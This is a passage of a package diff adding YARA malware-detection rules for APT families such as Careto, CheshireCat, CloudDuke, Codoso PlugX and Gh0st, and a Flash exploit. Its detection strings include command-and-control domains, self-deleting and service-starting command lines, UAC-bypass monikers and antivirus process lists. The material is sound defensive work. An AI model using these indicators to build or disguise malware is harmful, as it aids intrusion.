+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+		date = "2014/02/11"
+	strings:
+		$1 = "cgi-bin/commcgi.cgi" ascii wide
+		$2 = "Group" ascii wide
+		$3 = "Install" ascii wide
+		$4 = "Bn" ascii wide
+	condition:
+		all of them
+}
+
+rule Careto_CnC_domains {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto known command and control domains"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+		date = "2014/02/11"
+	strings:
+		$1 = "linkconf.net" ascii wide nocase
+		$2 = "redirserver.net" ascii wide nocase
+		$3 = "swupdt.com" ascii wide nocase
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_CheshireCat.yar remnux-rules-0.0.4/yara/malware/APT_CheshireCat.yar
--- remnux-rules-0.0.3/yara/malware/APT_CheshireCat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_CheshireCat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,106 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-08-08
+	Identifier: Cheshire Cat
+	Version: 0.1 
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule CheshireCat_Sample2 {
+	meta:
+		description = "Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
+		author = "Florian Roth"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		date = "2015-08-08"
+		score = 70
+		hash = "dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8"
+	strings:
+		$s0 = "mpgvwr32.dll" fullword ascii
+		$s1 = "Unexpected failure of wait! (%d)" fullword ascii
+		$s2 = "\"%s\" /e%d /p%s" fullword ascii
+		$s4 = "error in params!" fullword ascii
+		$s5 = "sscanf" fullword ascii
+		$s6 = "<>Param : 0x%x" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 100KB and 4 of ($s*)
+}
+
+/* Generic Rules ----------------------------------------------------------- */
+/* Gen1 is more exact than Gen2 - until now I had no FPs with Gen2 */
+
+rule CheshireCat_Gen1 {
+	meta:
+		description = "Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		author = "Florian Roth"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		date = "2015-08-08"
+		super_rule = 1
+		score = 90
+		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
+		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
+	strings:
+		$x1 = "CAPESPN.DLL" fullword wide
+		$x2 = "WINF.DLL" fullword wide
+		$x3 = "NCFG.DLL" fullword wide
+		$x4 = "msgrthlp.dll" fullword wide
+		$x5 = "Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}" fullword ascii
+		$x6 = "Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}" fullword ascii
+
+		$a1 = "Interface\\%s\\info" fullword ascii
+		$a2 = "Interface\\%s\\info\\%s" fullword ascii
+		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
+		$a4 = "CLSID\\%s\\info" fullword ascii
+
+		$b1 = "Windows Shell Icon Handler" fullword wide
+		$b2 = "Microsoft Shell Icon Handler" fullword wide
+
+		$s1 = "\\StringFileInfo\\%s\\FileVersion" fullword ascii
+		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
+		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
+		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
+		$s5 = "%sMutex" fullword ascii
+		$s6 = "\\ShellIconCache" fullword ascii
+		$s7 = "+6Service Pack " fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 350KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*) and 1 of ($x*)
+}
+
+rule CheshireCat_Gen2 {
+	meta:
+		description = "Auto-generated rule - from files 32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a, 63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		author = "Florian Roth"
+		reference = "https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/"
+		date = "2015-08-08"
+		super_rule = 1
+		score = 70
+		hash1 = "ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300"
+		hash2 = "32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a"
+		hash3 = "63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb"
+		hash4 = "c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532"
+	strings:
+		$a1 = "Interface\\%s\\info" fullword ascii
+		$a2 = "Interface\\%s\\info\\%s" fullword ascii
+		$a3 = "CLSID\\%s\\info\\%s" fullword ascii
+		$a4 = "CLSID\\%s\\info" fullword ascii
+
+		$b1 = "Windows Shell Icon Handler" fullword wide
+		$b2 = "Microsoft Shell Icon Handler" fullword wide
+
+		$s1 = "\\StringFileInfo\\%s\\FileVersion" fullword ascii
+		$s2 = "CLSID\\%s\\AuxCLSID" fullword ascii
+		$s3 = "lnkfile\\shellex\\IconHandler" fullword ascii
+		$s4 = "%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT" fullword ascii
+		$s5 = "%sMutex" fullword ascii
+		$s6 = "\\ShellIconCache" fullword ascii
+		$s7 = "+6Service Pack " fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 200KB and 7 of ($s*) and 2 of ($a*) and 1 of ($b*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Cloudduke.yar remnux-rules-0.0.4/yara/malware/APT_Cloudduke.yar
--- remnux-rules-0.0.3/yara/malware/APT_Cloudduke.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Cloudduke.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,61 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule CloudDuke_Malware {
+	meta:
+		description = "Detects CloudDuke Malware"
+		author = "Florian Roth"
+		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
+		date = "2015-07-22"
+		score = 60
+		hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
+		hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash5 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
+		hash6 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+		hash7 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash8 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
+		hash9 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
+		hash10 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		hash11 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash12 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
+		hash13 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+		hash14 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+		hash15 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
+	strings:
+		$s1 = "ProcDataWrap" fullword ascii
+		$s2 = "imagehlp.dll" fullword ascii
+		$s3 = "dnlibsh" fullword ascii
+		$s4 = "%ws_out%ws" fullword wide
+		$s5 = "Akernel32.dll" fullword wide
+
+		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */
+		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */
+		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 720KB and 4 of ($s*) and 1 of ($op*)
+}
+
+/* Super Rules ------------------------------------------------------------- */
+
+rule SFXRAR_Acrotray {
+	meta:
+		description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
+		author = "Florian Roth"
+		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
+		date = "2015-07-22"
+		super_rule = 1
+		score = 70
+		hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
+		hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
+		hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
+	strings:
+		$s1 = "winrarsfxmappingfile.tmp" fullword wide /* PEStudio Blacklist: strings */
+		$s2 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */
+		$s3 = "acrotray.exe" fullword ascii
+		$s4 = "CryptUnprotectMemory failed" fullword wide /* PEStudio Blacklist: strings */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 2449KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Codoso.yar remnux-rules-0.0.4/yara/malware/APT_Codoso.yar
--- remnux-rules-0.0.3/yara/malware/APT_Codoso.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Codoso.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,340 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-01-30
+	Identifier: Codoso
+	Comment: Reduced signature set for LOKI integration
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Codoso_PlugX_3 {
+	meta:
+		description = "Detects Codoso APT PlugX Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
+	strings:
+		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
+		$s2 = "mcs.exe" fullword ascii
+		$s3 = "McAltLib.dll" fullword ascii
+		$s4 = "WinRAR self-extracting archive" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1200KB and all of them
+}
+rule Codoso_PlugX_2 {
+	meta:
+		description = "Detects Codoso APT PlugX Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
+	strings:
+		$s1 = "%TEMP%\\HID" fullword wide
+		$s2 = "%s\\hid.dll" fullword wide
+		$s3 = "%s\\SOUNDMAN.exe" fullword wide
+		$s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
+		$s5 = "%s\\HID.dllx" fullword wide
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
+}
+rule Codoso_CustomTCP_4 {
+	meta:
+		description = "Detects Codoso APT CustomTCP Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
+		hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
+		hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
+		hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
+	strings:
+		$x1 = "varus_service_x86.dll" fullword ascii
+
+		$s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
+		$s2 = "net start %%1" fullword ascii
+		$s3 = "ping 127.1 > nul" fullword ascii
+		$s4 = "McInitMISPAlertEx" fullword ascii
+		$s5 = "sc start %%1" fullword ascii
+		$s6 = "net stop %%1" fullword ascii
+		$s7 = "WorkerRun" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 400KB and 5 of them ) or
+		( $x1 and 2 of ($s*) )
+}
+rule Codoso_CustomTCP_3 {
+	meta:
+		description = "Detects Codoso APT CustomTCP Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
+	strings:
+		$s1 = "DnsApi.dll" fullword ascii
+		$s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
+		$s3 = "CONNECT %s:%d hTTP/1.1" ascii
+		$s4 = "CONNECT %s:%d HTTp/1.1" ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
+		$s6 = "iphlpapi.dll" ascii
+		$s7 = "%systemroot%\\Web\\" ascii
+		$s8 = "Proxy-Authorization: Negotiate %s" ascii
+		$s9 = "CLSID\\{%s}\\InprocServer32" ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
+}
+rule Codoso_CustomTCP_2 {
+	meta:
+		description = "Detects Codoso APT CustomTCP Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
+	strings:
+		$s1 = "varus_service_x86.dll" fullword ascii
+		$s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
+		$s3 = "net start %%1" fullword ascii
+		$s4 = "ping 127.1 > nul" fullword ascii
+		$s5 = "McInitMISPAlertEx" fullword ascii
+		$s6 = "sc start %%1" fullword ascii
+		$s7 = "B_WKNDNSK^" fullword ascii
+		$s8 = "net stop %%1" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 406KB and all of them
+}
+rule Codoso_PGV_PVID_6 {
+	meta:
+		description = "Detects Codoso APT PGV_PVID Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
+	strings:
+		$s0 = "rundll32 \"%s\",%s" fullword ascii
+		$s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 6000KB and all of them
+}
+rule Codoso_Gh0st_3 {
+	meta:
+		description = "Detects Codoso APT Gh0st Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
+	strings:
+		$x1 = "RunMeByDLL32" fullword ascii
+
+		$s1 = "svchost.dll" fullword wide
+		$s2 = "server.dll" fullword ascii
+		$s3 = "Copyright ? 2008" fullword wide
+		$s4 = "testsupdate33" fullword ascii
+		$s5 = "Device Protect Application" fullword wide
+		$s6 = "MSVCP60.DLL" fullword ascii /* Goodware String - occured 1 times */
+		$s7 = "mail-news.eicp.net" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
+}
+rule Codoso_Gh0st_2 {
+	meta:
+		description = "Detects Codoso APT Gh0st Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
+	strings:
+		$s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+		$s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+		$s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$s14 = "%s -r debug 1" fullword ascii
+		$s15 = "\\\\.\\keymmdrv1" fullword ascii
+		$s17 = "RunMeByDLL32" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and 1 of them
+}
+rule Codoso_CustomTCP {
+	meta:
+		description = "Codoso CustomTCP Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
+	strings:
+		$s4 = "wnyglw" fullword ascii
+		$s5 = "WorkerRun" fullword ascii
+		$s7 = "boazdcd" fullword ascii
+		$s8 = "wayflw" fullword ascii
+		$s9 = "CODETABL" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 405KB and all of them
+}
+
+/* Super Rules ------------------------------------------------------------- */
+
+rule Codoso_PGV_PVID_5 {
+	meta:
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+	strings:
+		$s1 = "/c del %s >> NUL" fullword ascii
+		$s2 = "%s%s.manifest" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and all of them
+}
+rule Codoso_Gh0st_1 {
+	meta:
+		description = "Detects Codoso APT Gh0st Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
+		hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
+		hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
+	strings:
+		$x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
+		$x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
+		$x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
+		$x4 = "\\\\.\\keymmdrv1" fullword ascii
+
+		$s1 = "spideragent.exe" fullword ascii
+		$s2 = "AVGIDSAgent.exe" fullword ascii
+		$s3 = "kavsvc.exe" fullword ascii
+		$s4 = "mspaint.exe" fullword ascii
+		$s5 = "kav.exe" fullword ascii
+		$s6 = "avp.exe" fullword ascii
+		$s7 = "NAV.exe" fullword ascii
+
+		$c1 = "Elevation:Administrator!new:" wide
+		$c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
+		$c3 = "\\sysprep\\sysprep.exe" fullword wide
+		$c4 = "\\sysprep\\CRYPTBASE.dll" fullword wide
+		$c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
+		$c6 = "ConsentPromptBehaviorAdmin" fullword ascii
+		$c7 = "\\sysprep" fullword wide
+		$c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and ( 4 of ($s*) or 4 of ($c*) ) or
+		1 of ($x*) or
+		6 of ($c*)
+}
+rule Codoso_PGV_PVID_4 {
+	meta:
+		description = "Detects Codoso APT PlugX Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+		hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
+		hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+	strings:
+		$x1 = "dropper, Version 1.0" fullword wide
+		$x2 = "dropper" fullword wide
+		$x3 = "DROPPER" fullword wide
+		$x4 = "About dropper" fullword wide
+
+		$s1 = "Microsoft Windows Manager Utility" fullword wide
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\" fullword ascii /* Goodware String - occured 9 times */
+		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii /* Goodware String - occured 10 times */
+		$s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii /* Goodware String - occured 46 times */
+		$s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii /* Goodware String - occured 65 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 900KB and 1 of ($x*) and 2 of ($s*)
+}
+rule Codoso_PlugX_1 {
+	meta:
+		description = "Detects Codoso APT PlugX Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
+		hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
+		hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
+	strings:
+		$s1 = "GETPASSWORD1" fullword ascii
+		$s2 = "NvSmartMax.dll" fullword ascii
+		$s3 = "LICENSEDLG" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 800KB and all of them
+}
+rule Codoso_PGV_PVID_3 {
+	meta:
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
+		hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
+		hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
+		hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+	strings:
+		$x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" fullword wide
+	condition:
+		$x1
+}
+rule Codoso_PGV_PVID_2 {
+	meta:
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
+		hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
+		hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
+	strings:
+		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+		$s1 = "regsvr32.exe /s \"%s\"" fullword ascii
+		$s2 = "Help and Support" fullword ascii
+		$s3 = "netsvcs" fullword ascii
+		$s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii /* Goodware String - occured 4 times */
+		$s10 = "winlogon" fullword ascii /* Goodware String - occured 4 times */
+		$s11 = "System\\CurrentControlSet\\Services" fullword ascii /* Goodware String - occured 11 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 907KB and all of them
+}
+rule Codoso_PGV_PVID_1 {
+	meta:
+		description = "Detects Codoso APT PGV PVID Malware"
+		author = "Florian Roth"
+		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
+		date = "2016-01-30"
+		super_rule = 1
+		hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
+		hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
+		hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
+		hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
+		hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
+	strings:
+		$x1 = "Cookie: pgv_pvid=" ascii
+		$x2 = "DRIVERS\\ipinip.sys" fullword wide
+
+		$s1 = "TsWorkSpaces.dll" fullword ascii
+		$s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
+		$s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
+		$s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
+		$s5 = "Microsoft Chart ActiveX Control" fullword wide
+		$s6 = "MSChartCtrl.ocx" fullword wide
+		$s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
+		$s8 = "WUServiceMain" fullword ascii /* Goodware String - occured 2 times */
+	condition:
+		( uint16(0) == 0x5a4d and ( 1 of ($x*) or 3 of them ) ) or
+		5 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_CVE2015_5119.yar remnux-rules-0.0.4/yara/malware/APT_CVE2015_5119.yar
--- remnux-rules-0.0.3/yara/malware/APT_CVE2015_5119.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_CVE2015_5119.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Flash_CVE_2015_5119_APT3 {
+    meta:
+        description = "Exploit Sample CVE-2015-5119"
+        author = "Florian Roth"
+        score = 70
+        yaraexchange = "No distribution without author's consent" 
+        date = "2015-08-01"
+    strings:
+        $s0 = "HT_exploit" fullword ascii
+        $s1 = "HT_Exploit" fullword ascii
+        $s2 = "flash_exploit_" ascii
+        $s3 = "exp1_fla/MainTimeline" ascii fullword
+        $s4 = "exp2_fla/MainTimeline" ascii fullword
+        $s5 = "_shellcode_32" fullword ascii
+        $s6 = "todo: unknown 32-bit target" fullword ascii 
+    condition:
+        uint16(0) == 0x5746 and 1 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Danti_svcmondr.yar remnux-rules-0.0.4/yara/malware/APT_Danti_svcmondr.yar
--- remnux-rules-0.0.3/yara/malware/APT_Danti_svcmondr.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Danti_svcmondr.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,76 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-05-25
+	Identifier: Kaspersky Report on threats involving CVE-2015-2545
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Mal_Dropper_httpEXE_from_CAB {
+	meta:
+		description = "Detects a dropper from a CAB file mentioned in the article"
+		author = "Florian Roth"
+		reference = "https://goo.gl/13Wgy1"
+		date = "2016-05-25"
+		score = 60
+		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
+	strings:
+		$s1 = "029.Hdl" fullword ascii
